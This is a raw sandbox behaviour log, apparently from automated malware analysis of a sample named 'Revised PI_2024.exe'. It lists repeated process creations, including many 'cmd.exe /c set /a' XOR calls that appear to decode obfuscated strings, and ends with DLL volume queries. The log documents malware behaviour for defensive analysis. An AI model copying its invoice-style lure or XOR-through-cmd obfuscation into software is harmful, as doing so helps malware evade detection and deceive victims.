            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeQueries volume information: C:\Users\user\Desktop\Revised PI_2024.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
